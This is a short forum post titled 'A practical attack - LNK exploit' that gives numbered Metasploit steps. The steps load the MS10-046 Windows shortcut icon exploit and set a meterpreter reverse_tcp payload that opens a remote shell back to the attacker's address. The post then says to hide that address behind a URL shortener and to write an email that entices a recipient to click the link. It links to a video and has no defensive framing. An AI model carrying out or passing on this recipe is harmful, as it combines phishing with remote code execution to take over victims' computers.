Jump to content
Nytro

A practical attack - LNK exploit

Recommended Posts

A practical attack - LNK exploit

Notes

1. sudo ./msfconsole

2. use windows/browser/ms10_046_shortcut_icon_dllloader excellent Microsoft Windows Shell LNK Code Execution

3. set SRVHOST 192.168.175.129

4. set Payload windows/meterpreter/reverse_tcp

5. set LHOST 192.168.175.129

6. exploit

7. go to shorturl.com and create a short url for your machines ip

8. Write an email enticing the recipient to click the link.

9. use metaterpreter.

10. pwnage.

Video:

http://vimeo.com/16699569

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...